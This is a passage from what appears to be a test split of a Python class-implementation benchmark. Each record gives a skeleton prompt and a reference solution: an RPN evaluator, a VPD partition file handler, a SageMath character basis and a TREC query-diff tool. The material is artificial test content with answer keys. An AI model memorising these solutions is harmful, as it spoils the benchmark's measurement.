Solution class.\n\nMethod signatures and docstrings:\n- def evalRPN(self, tokens: List[str]) -> int: 栈\n- def evalRPNArray(self, tokens: List[str]) -> int: 数组模拟栈", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def evalRPN(self, tokens: List[str]) -> int: 栈\n- def evalRPNArray(self, tokens: List[str]) -> int: 数组模拟栈\n\n<|skeleton|>\nclass Solution:\n\n def evalRPN(self, tokens: List[str]) -> int:\n \"\"\"栈\"\"\"\n <|body_0|>\n\n def evalRPNArray(self, tokens: List[str]) -> int:\n \"\"\"数组模拟栈\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n stack = []\n for token in tokens:\n if token not in ('+', '-', '*', '/'):\n stack.append(token)\n else:\n x, y = (int(stack.pop()), int(stack.pop()))\n if token == '+':\n stack.append(x + y)\n elif token == '-':\n stack.append(y - x)\n elif token == '*':\n stack.append(x * y)\n else:\n stack.append(y / x)\n return int(stack[0])\n<|end_body_0|>\n\n<|body_start_1|>\n op_to_binary_fn = {'+': add, '-': sub, '*': mul, '/': lambda x, y: int(x / y)}\n n = len(tokens)\n stack = [0] * ((n + 1) // 2)\n index = -1\n for token in tokens:\n try:\n num = int(token)\n index += 1\n stack[index] = num\n except ValueError:\n index -= 1\n stack[index] = op_to_binary_fn[token](stack[index], stack[index + 1])\n return stack[0]\n<|end_body_1|>\n", "revision_id": "52756b30e9d51794591aca030bc918e707f473f1", "skeleton": "<|skeleton|>\nclass Solution:\n\n def evalRPN(self, tokens: List[str]) -> int:\n \"\"\"栈\"\"\"\n <|body_0|>\n\n def evalRPNArray(self, tokens: List[str]) -> int:\n \"\"\"数组模拟栈\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def evalRPN(self, tokens: List[str]) -> int:\n \"\"\"栈\"\"\"\n stack = []\n for token in tokens:\n if token not in ('+', '-', '*', '/'):\n stack.append(token)\n else:\n x, y = (int(stack.pop()), int(stack.pop()))\n if token == '+':\n stack.append(x + y)\n elif token == '-':\n stack.append(y - x)\n elif token == '*':\n stack.append(x * y)\n else:\n stack.append(y / x)\n return int(stack[0])\n\n def evalRPNArray(self, tokens: List[str]) -> int:\n \"\"\"数组模拟栈\"\"\"\n op_to_binary_fn = {'+': add, '-': sub, '*': mul, '/': lambda x, y: int(x / y)}\n n = len(tokens)\n stack = [0] * ((n + 1) // 2)\n index = -1\n for token in tokens:\n try:\n num = int(token)\n index += 1\n stack[index] = num\n except ValueError:\n index -= 1\n stack[index] = op_to_binary_fn[token](stack[index], stack[index + 1])\n return stack[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "150.逆波兰表达式求值/solution.py", "source_repo": "QtTao/daily_leetcode", "split": "test", "star_events_count": 0} {"blob_id": "d990f99a85837f2e7ae11b0c294f68e8fbb78c55", "bodies": ["for key in keys:\n file_path = self._device.path.join(self._path, key)\n if self._device.path.exists(file_path):\n self._device.CheckCall(['rm', '-f', file_path])\n return", "for k, v in items.items():\n file_name = self._device.path.join(self._path, k)\n if v is not None:\n dir_name = self._device.path.dirname(file_name)\n self._device.CheckCall(['mkdir', '-p', dir_name])\n self._device.WriteFile(file_name, v)\n else:\n self._device.CheckCall(['rm', '-f', file_name])\nself._device.CheckCall(['sync'])"], "bodies_text": "<|body_start_0|>\n for key in keys:\n file_path = self._device.path.join(self._path, key)\n if 
self._device.path.exists(file_path):\n self._device.CheckCall(['rm', '-f', file_path])\n return\n<|end_body_0|>\n\n<|body_start_1|>\n for k, v in items.items():\n file_name = self._device.path.join(self._path, k)\n if v is not None:\n dir_name = self._device.path.dirname(file_name)\n self._device.CheckCall(['mkdir', '-p', dir_name])\n self._device.WriteFile(file_name, v)\n else:\n self._device.CheckCall(['rm', '-f', file_name])\n self._device.CheckCall(['sync'])\n<|end_body_1|>\n", "class_docstring": "A file-based VPD partition.", "class_name": "MutableFileBasedPartition", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MutableFileBasedPartition:\n \"\"\"A file-based VPD partition.\"\"\"\n\n def Delete(self, *keys):\n \"\"\"See Partition.Delete.\"\"\"\n <|body_0|>\n\n def Update(self, items, log=True):\n \"\"\"See Partition.Update.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for key in keys:\n file_path = self._device.path.join(self._path, key)\n if self._device.path.exists(file_path):\n self._device.CheckCall(['rm', '-f', file_path])\n return\n<|end_body_0|>\n\n<|body_start_1|>\n for k, v in items.items():\n file_name = self._device.path.join(self._path, k)\n if v is not None:\n dir_name = self._device.path.dirname(file_name)\n self._device.CheckCall(['mkdir', '-p', dir_name])\n self._device.WriteFile(file_name, v)\n else:\n self._device.CheckCall(['rm', '-f', file_name])\n self._device.CheckCall(['sync'])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000245", "length_bytes": 9662, "license_type": "permissive", "methods": [{"docstring": "See Partition.Delete.", "name": "Delete", "signature": "def Delete(self, *keys)"}, {"docstring": "See Partition.Update.", "name": "Update", "signature": "def Update(self, items, log=True)"}], "n_methods": 2, "prompt": "Implement the Python class `MutableFileBasedPartition` described below.\n\nClass description:\nA file-based VPD partition.\n\nMethod signatures and docstrings:\n- def Delete(self, *keys): See Partition.Delete.\n- def Update(self, items, log=True): See Partition.Update.", "prompted_full_text": "Implement the Python class `MutableFileBasedPartition` described below.\n\nClass description:\nA file-based VPD partition.\n\nMethod signatures and docstrings:\n- def Delete(self, *keys): See Partition.Delete.\n- def Update(self, items, log=True): See Partition.Update.\n\n<|skeleton|>\nclass MutableFileBasedPartition:\n \"\"\"A file-based VPD partition.\"\"\"\n\n def Delete(self, *keys):\n \"\"\"See Partition.Delete.\"\"\"\n <|body_0|>\n\n def Update(self, items, log=True):\n \"\"\"See Partition.Update.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for key in keys:\n file_path = self._device.path.join(self._path, key)\n if self._device.path.exists(file_path):\n self._device.CheckCall(['rm', '-f', file_path])\n return\n<|end_body_0|>\n\n<|body_start_1|>\n for k, v in items.items():\n file_name = self._device.path.join(self._path, k)\n if v is not None:\n dir_name = self._device.path.dirname(file_name)\n self._device.CheckCall(['mkdir', '-p', dir_name])\n self._device.WriteFile(file_name, v)\n else:\n self._device.CheckCall(['rm', '-f', file_name])\n self._device.CheckCall(['sync'])\n<|end_body_1|>\n", "revision_id": "a1b0fccd68987d8cd9c89710adc3c04b868347ec", "skeleton": "<|skeleton|>\nclass MutableFileBasedPartition:\n \"\"\"A file-based VPD partition.\"\"\"\n\n def Delete(self, *keys):\n \"\"\"See Partition.Delete.\"\"\"\n 
<|body_0|>\n\n def Update(self, items, log=True):\n \"\"\"See Partition.Update.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MutableFileBasedPartition:\n \"\"\"A file-based VPD partition.\"\"\"\n\n def Delete(self, *keys):\n \"\"\"See Partition.Delete.\"\"\"\n for key in keys:\n file_path = self._device.path.join(self._path, key)\n if self._device.path.exists(file_path):\n self._device.CheckCall(['rm', '-f', file_path])\n return\n\n def Update(self, items, log=True):\n \"\"\"See Partition.Update.\"\"\"\n for k, v in items.items():\n file_name = self._device.path.join(self._path, k)\n if v is not None:\n dir_name = self._device.path.dirname(file_name)\n self._device.CheckCall(['mkdir', '-p', dir_name])\n self._device.WriteFile(file_name, v)\n else:\n self._device.CheckCall(['rm', '-f', file_name])\n self._device.CheckCall(['sync'])\n", "source": "the_stack_v2_python_sparse", "source_path": "py/device/vpd.py", "source_repo": "bridder/factory", "split": "test", "star_events_count": 0} {"blob_id": "f6a9da15cd7d656815adf5d4625f848a44487e39", "bodies": ["SFA_generic.__init__(self, Sym, basis_name=bname, prefix=pfix, graded=False)\nself._other = other_basis\nself.module_morphism(self._self_to_other_on_basis, codomain=self._other).register_as_coercion()\nself.register_coercion(SetMorphism(Hom(self._other, self), self._other_to_self))", "if not lam:\n return self._other([])\nn = sum(lam) + lam[0]\nsim = self._other(self._other(lam).character_to_frobenius_image(n))\nreturn self._other(lam) - sum((c * self._self_to_other_on_basis(Partition(mu[1:])) for mu, c in sim if mu[1:] != lam))"], "bodies_text": "<|body_start_0|>\n SFA_generic.__init__(self, Sym, basis_name=bname, prefix=pfix, graded=False)\n self._other = other_basis\n self.module_morphism(self._self_to_other_on_basis, codomain=self._other).register_as_coercion()\n self.register_coercion(SetMorphism(Hom(self._other, self), self._other_to_self))\n<|end_body_0|>\n\n<|body_start_1|>\n if not lam:\n return self._other([])\n n = sum(lam) + lam[0]\n sim = self._other(self._other(lam).character_to_frobenius_image(n))\n return self._other(lam) - sum((c * self._self_to_other_on_basis(Partition(mu[1:])) for mu, c in sim if mu[1:] != lam))\n<|end_body_1|>\n", "class_docstring": "General code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -", "class_name": "character_basis", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass character_basis:\n \"\"\"General code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. 
It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\"\"\"\n\n def __init__(self, Sym, other_basis, bname, pfix):\n \"\"\"Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\"\"\"\n <|body_0|>\n\n def _self_to_other_on_basis(self, lam):\n \"\"\"Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n SFA_generic.__init__(self, Sym, basis_name=bname, prefix=pfix, graded=False)\n self._other = other_basis\n self.module_morphism(self._self_to_other_on_basis, codomain=self._other).register_as_coercion()\n self.register_coercion(SetMorphism(Hom(self._other, self), self._other_to_self))\n<|end_body_0|>\n\n<|body_start_1|>\n if not lam:\n return self._other([])\n n = sum(lam) + lam[0]\n sim = self._other(self._other(lam).character_to_frobenius_image(n))\n return self._other(lam) - sum((c * self._self_to_other_on_basis(Partition(mu[1:])) for mu, c in sim if mu[1:] != lam))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000246", "length_bytes": 16482, "license_type": "no_license", "methods": [{"docstring": "Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. 
INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()", "name": "__init__", "signature": "def __init__(self, Sym, other_basis, bname, pfix)"}, {"docstring": "Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h", "name": "_self_to_other_on_basis", "signature": "def _self_to_other_on_basis(self, lam)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003941", "prompt": "Implement the Python class `character_basis` described below.\n\nClass description:\nGeneral code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\n\nMethod signatures and docstrings:\n- def __init__(self, Sym, other_basis, bname, pfix): Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\n- def _self_to_other_on_basis(self, lam): Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. 
INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h", "prompted_full_text": "Implement the Python class `character_basis` described below.\n\nClass description:\nGeneral code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\n\nMethod signatures and docstrings:\n- def __init__(self, Sym, other_basis, bname, pfix): Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\n- def _self_to_other_on_basis(self, lam): Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h\n\n<|skeleton|>\nclass character_basis:\n \"\"\"General code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. 
EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\"\"\"\n\n def __init__(self, Sym, other_basis, bname, pfix):\n \"\"\"Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\"\"\"\n <|body_0|>\n\n def _self_to_other_on_basis(self, lam):\n \"\"\"Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n SFA_generic.__init__(self, Sym, basis_name=bname, prefix=pfix, graded=False)\n self._other = other_basis\n self.module_morphism(self._self_to_other_on_basis, codomain=self._other).register_as_coercion()\n self.register_coercion(SetMorphism(Hom(self._other, self), self._other_to_self))\n<|end_body_0|>\n\n<|body_start_1|>\n if not lam:\n return self._other([])\n n = sum(lam) + lam[0]\n sim = self._other(self._other(lam).character_to_frobenius_image(n))\n return self._other(lam) - sum((c * self._self_to_other_on_basis(Partition(mu[1:])) for mu, c in sim if mu[1:] != lam))\n<|end_body_1|>\n", "revision_id": "0d9eacbf74e2acffefde93e39f8bcbec745cdaba", "skeleton": "<|skeleton|>\nclass character_basis:\n \"\"\"General code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\"\"\"\n\n def __init__(self, Sym, other_basis, bname, pfix):\n \"\"\"Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. 
INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\"\"\"\n <|body_0|>\n\n def _self_to_other_on_basis(self, lam):\n \"\"\"Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class character_basis:\n \"\"\"General code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\"\"\"\n\n def __init__(self, Sym, other_basis, bname, pfix):\n \"\"\"Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\"\"\"\n SFA_generic.__init__(self, Sym, basis_name=bname, prefix=pfix, graded=False)\n self._other = other_basis\n self.module_morphism(self._self_to_other_on_basis, codomain=self._other).register_as_coercion()\n self.register_coercion(SetMorphism(Hom(self._other, self), self._other_to_self))\n\n def _self_to_other_on_basis(self, lam):\n \"\"\"Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. 
INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h\"\"\"\n if not lam:\n return self._other([])\n n = sum(lam) + lam[0]\n sim = self._other(self._other(lam).character_to_frobenius_image(n))\n return self._other(lam) - sum((c * self._self_to_other_on_basis(Partition(mu[1:])) for mu, c in sim if mu[1:] != lam))\n", "source": "the_stack_v2_python_sparse", "source_path": "sage/src/sage/combinat/sf/character.py", "source_repo": "bopopescu/geosci", "split": "test", "star_events_count": 0} {"blob_id": "42c6755132e715958b21025cf490d7e4fad79cfa", "bodies": ["self.__run1_file = run1_file\nself.__run2_file = run2_file\nself.__qrels = qrels\nself.__metric = metric", "te_method1 = TrecEval()\nte_method1.evaluate(self.__qrels, self.__run1_file)\nte_method2 = TrecEval()\nte_method2.evaluate(self.__qrels, self.__run2_file)\ndata = []\nfor query_id in te_method1.get_query_ids():\n res1 = te_method1.get_score(query_id, self.__metric)\n res2 = te_method2.get_score(query_id, self.__metric)\n data.append([query_id, res1, res2, round(res2 - res1, 4)])\nsorted_data = sorted(data, key=lambda l: l[3], reverse=True)\nFileUtils.dump_tsv(output_file, sorted_data, header=['queryID', 'method1', 'method2', 'diff'])"], "bodies_text": "<|body_start_0|>\n self.__run1_file = run1_file\n self.__run2_file = run2_file\n self.__qrels = qrels\n self.__metric = metric\n<|end_body_0|>\n\n<|body_start_1|>\n te_method1 = TrecEval()\n te_method1.evaluate(self.__qrels, self.__run1_file)\n te_method2 = TrecEval()\n te_method2.evaluate(self.__qrels, self.__run2_file)\n data = []\n for query_id in te_method1.get_query_ids():\n res1 = te_method1.get_score(query_id, self.__metric)\n res2 = te_method2.get_score(query_id, self.__metric)\n data.append([query_id, res1, res2, round(res2 - res1, 4)])\n sorted_data = sorted(data, key=lambda l: l[3], reverse=True)\n FileUtils.dump_tsv(output_file, sorted_data, header=['queryID', 'method1', 'method2', 'diff'])\n<|end_body_1|>\n", "class_docstring": "", "class_name": "QueryDiff", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass QueryDiff:\n\n def __init__(self, run1_file, run2_file, qrels, metric):\n \"\"\":param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\"\"\"\n <|body_0|>\n\n def dump_differences(self, output_file):\n \"\"\"Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. 
Output format: queryID res1 res2 diff(res2-res1)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__run1_file = run1_file\n self.__run2_file = run2_file\n self.__qrels = qrels\n self.__metric = metric\n<|end_body_0|>\n\n<|body_start_1|>\n te_method1 = TrecEval()\n te_method1.evaluate(self.__qrels, self.__run1_file)\n te_method2 = TrecEval()\n te_method2.evaluate(self.__qrels, self.__run2_file)\n data = []\n for query_id in te_method1.get_query_ids():\n res1 = te_method1.get_score(query_id, self.__metric)\n res2 = te_method2.get_score(query_id, self.__metric)\n data.append([query_id, res1, res2, round(res2 - res1, 4)])\n sorted_data = sorted(data, key=lambda l: l[3], reverse=True)\n FileUtils.dump_tsv(output_file, sorted_data, header=['queryID', 'method1', 'method2', 'diff'])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000247", "length_bytes": 1678, "license_type": "permissive", "methods": [{"docstring": ":param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:", "name": "__init__", "signature": "def __init__(self, run1_file, run2_file, qrels, metric)"}, {"docstring": "Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. Output format: queryID res1 res2 diff(res2-res1)", "name": "dump_differences", "signature": "def dump_differences(self, output_file)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005780", "prompt": "Implement the Python class `QueryDiff` described below.\n\nClass description:\nImplement the QueryDiff class.\n\nMethod signatures and docstrings:\n- def __init__(self, run1_file, run2_file, qrels, metric): 